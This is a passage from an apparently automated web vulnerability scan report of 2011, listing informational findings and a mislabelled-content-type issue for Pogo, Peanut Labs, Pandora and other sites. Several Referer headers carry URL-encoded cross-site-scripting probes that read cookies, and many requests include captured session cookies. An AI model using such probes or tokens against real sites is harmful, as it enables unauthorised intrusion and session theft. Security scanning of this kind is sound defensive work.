Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 20
Expires: Sun, 09 Jan 2011 02:07:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 09 Jan 2011 02:07:58 GMT
Connection: close

<h1>Bad Request</h1>

24.14. http://download-games.pogo.com/game.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/game.htm

Request

GET /game.htm HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1105
Content-Type: text/html
Cache-Control: private, max-age=14400
Date: Sun, 09 Jan 2011 02:10:09 GMT
Connection: close

<html>
   <head>
       <title></title>
       <script language="javascript">
       <!--
           function RedirectToGamePage()
           {
               //Get the URL from the address bar
               var tmpAddressBar = new String();

...[SNIP]...

24.15. http://game3.pogo.com/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/blank.html

Request

GET /blank.html HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
ETag: W/"61-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Type: text/html
Content-Length: 61
Date: Sun, 09 Jan 2011 01:34:06 GMT
Server: Apache-Coyote/1.1

<html>
<head>
</head>
<body bgcolor=ffffcc>
</body>
</html>

24.16. http://game3.pogo.com/room/util/silentclosepage.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/util/silentclosepage.html

Request

GET /room/util/silentclosepage.html HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response

HTTP/1.1 200 OK
Age: 133219
Date: Fri, 07 Jan 2011 13:24:38 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"146-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Type: text/html
Content-Length: 146
Server: Apache-Coyote/1.1

<html>

<head>
<title>Game Closing</title>

<script language="JavaScript">
top.close();
</script>
</head>

<body bgcolor=ffffff>
</body>

</html>

24.17. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/v/11.1.9.13/applet/scrabble/

Request

Response

HTTP/1.1 404 /applet/scrabble/
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:15:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 3945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...

24.18. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/v/11.1.9.44/applet/jvmtest/

Request

Response

HTTP/1.1 404 /applet/jvmtest/
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:15:26 GMT
Server: Apache-Coyote/1.1
Content-Length: 3751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...

24.19. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.20. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.21. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-2.js

Request

GET /a/4252/4762/6942-2.js?cb= HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ses15=4762^2; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;

Response

HTTP/1.0 408 Request Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>408 Request Time-out</h1>
Your browser didn't send a complete request in time.
</body></html>

24.22. http://www.e00.peanutlabs.com/js/iFrame/sc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/sc.php

Request

Response

24.23. http://www.e00.peanutlabs.com/recvMid.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/recvMid.php

Request

Response

24.24. http://www.intellicast.com/Travel/CheapFlightsWidget.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Travel/CheapFlightsWidget.htm

Request

Response

24.25. http://www.pandora.com/facebook/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/facebook/xd_receiver.htm

Request

Response

24.26. http://www.pandora.com/include/backstageAdEmbed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/include/backstageAdEmbed.html

Request

GET /include/backstageAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536184817674250&clean=0&spgs=0&tile=1&_id=leaderboard_container HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/backstage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.4.10.1294536123

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:00 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 22:58:48 GMT
ETag: "12c-4990d3617da00"
Accept-Ranges: bytes
Content-Length: 300
Content-Type: text/html

<html>
<head>
<script src="/include/Patron.js"></script>
</head>
<body>
<script>
Patron.setZone("backstage");

// ad size is determined from the URL for this page.
if (location.search && location.sear
...[SNIP]...

24.27. http://www.pandora.com/include/communityAdEmbed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/include/communityAdEmbed.html

Request

GET /include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.3.10.1294536123

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:22:53 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 22:58:48 GMT
ETag: "12c-4990d3617da00"
Accept-Ranges: bytes
Content-Length: 300
Content-Type: text/html

<html>
<head>
<script src="/include/Patron.js"></script>
</head>
<body>
<script>
Patron.setZone("community");

// ad size is determined from the URL for this page.
if (location.search && location.sear
...[SNIP]...

24.28. http://www.peanutlabs.com/generateUserId.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/generateUserId.php

Request

GET /generateUserId.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 87
Connection: close
Content-Type: text/html

<head>
<title>User Id Generator</title>
</head>
sorry, you must provide the valid pass!

24.29. http://www.peanutlabs.com/js/iFrame/sc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/js/iFrame/sc.php

Request

Response

24.30. http://www.peanutlabs.com/recvMid.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/recvMid.php

Request

GET /recvMid.php?mid=undefined&userId=998826224%2D3432%2D8939b981e2 HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/js/iFrame/mloader.swf?userId=998826224-3432-8939b981e2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:31:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 13

mid=&update=1

24.31. http://www.peanutlabs.com/sampleIframe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/sampleIframe.php

Request

GET /sampleIframe.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:08 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 480
Connection: close
Content-Type: text/html

<head><title>Sample iFrame</title></head>
<body bgcolor="#e7e7e7">

<div align="center">

<iframe align="middle" frameborder=0 scrolling="no" style="width:653px; height:1230px;"
src="/pl/userGreetin
...[SNIP]...

24.32. https://www.pogo.com/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png

Request

GET /v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/action/pogop/heavyregview.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 /reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:29:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 3761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>


...[SNIP]...

24.33. http://www.thedailynews.cc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/

Request

GET / HTTP/1.1
Host: www.thedailynews.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.34. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/cleardot.gif

Request

Response

24.35. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

Request

Response

24.36. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

Request

Response

24.37. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

Request

Response

24.38. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

Request

Response

24.39. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/scripts/timthumb.php

Request

GET /wp-content/themes/showtime/scripts/timthumb.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 400 Bad Request
Date: Sun, 09 Jan 2011 03:10:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 58
Connection: close
Content-Type: text/html

<pre>no image specified<br />TimThumb version : 1.14</pre>

25. Content type incorrectly stated previous next
There are 32 instances of this issue:

http://altfarm.mediaplex.com/ad/js/55290
http://board-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg
http://board-games.pogo.com/include/js/java-detect.jsp
http://board-games.pogo.com/v/DV37sw/include/css/pogo.css
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://card-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg
http://card-games.pogo.com/include/js/java-detect.jsp
http://card-games.pogo.com/v/DV37sw/include/css/pogo.css
http://download-games.pogo.com/Category.aspx
http://download-games.pogo.com/deluxe.aspx
http://event.adxpose.com/event.flow
http://game3.pogo.com/include/css/pogo.css
http://www.cmsinter.net/blog/wp-content/uploads/2011/01/image.jpeg
http://www.e00.peanutlabs.com/recvMid.php
http://www.facebook.com/extern/login_status.php
http://www.mlive.com/08design/images/regions_bar_image.gif
http://www.mlive.com/08design/images/regions_bar_statewide.gif
http://www.mlive.com/08design/images/samples/weather_map_thumbnail.jpg
http://www.mlive.com/favicon.ico
http://www.peanutlabs.com/publisher/dashboard2/framework_3.2.0.3958.swz
http://www.peanutlabs.com/recvMid.php
http://www.pogo.com/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg
http://www.pogo.com/img/header/main/en_US/pogo/header-home.jpg
http://www.pogo.com/include/css/pogo.css
http://www.pogo.com/include/js/java-detect.jsp
http://www.pogo.com/v/DV37sw/include/css/pogo.css
http://www.pogo.com/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png
http://www.pogo.com/vl/img/prize/en_US/pogo/daily-prize-drawings.gif
https://www.pogo.com/surveys/peanutlabsprocesssubs.do
https://www.pogo.com/v/DV37sw/include/css/pogo.css
http://www.slidedeck.com/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js
http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://altfarm.mediaplex.com/ad/js/55290 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/55290

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ad/js/55290 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: svid=517004695355;

Response

25.2. http://board-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://board-games.pogo.com
Path:	/img/header/main/en_US/pogo/header-home.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/header/main/en_US/pogo/header-home.jpg HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://board-games.pogo.com/games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025; s_pers=%20s_nr%3D1294539172918-New%7C1297131172918%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 137073
Date: Fri, 07 Jan 2011 13:24:37 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"18172-1277155322000"
Last-Modified: Mon, 21 Jun 2010 21:22:02 GMT
Content-Type: image/jpeg
Content-Length: 18172
Server: Apache-Coyote/1.1

GIF89a..I....%..Q.."..N.....S...
....M..t.....r..c.....&&&i..S.....t....R...n..2KTq.......--..Jkv...q....*t..Z..u..Q..p..N..n...()Sw....G...........8.....t.....n.....g`!...QFi!..s..&%.t..i..o..x...KJ.
...[SNIP]...

25.3. http://board-games.pogo.com/include/js/java-detect.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://board-games.pogo.com
Path:	/include/js/java-detect.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/js/java-detect.jsp HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://board-games.pogo.com/games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294537888307-New%7C1297129888307%3B; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:12:41 GMT
Server: Apache-Coyote/1.1
Content-Length: 8870

var JvmHandler = {};
JvmHandler.javaAlert = function (option){
switch(option){
        case 'reco' :
JvmHandler.reportAlert("JVM Test: Recommend Upgrade");
        break;
        case
...[SNIP]...

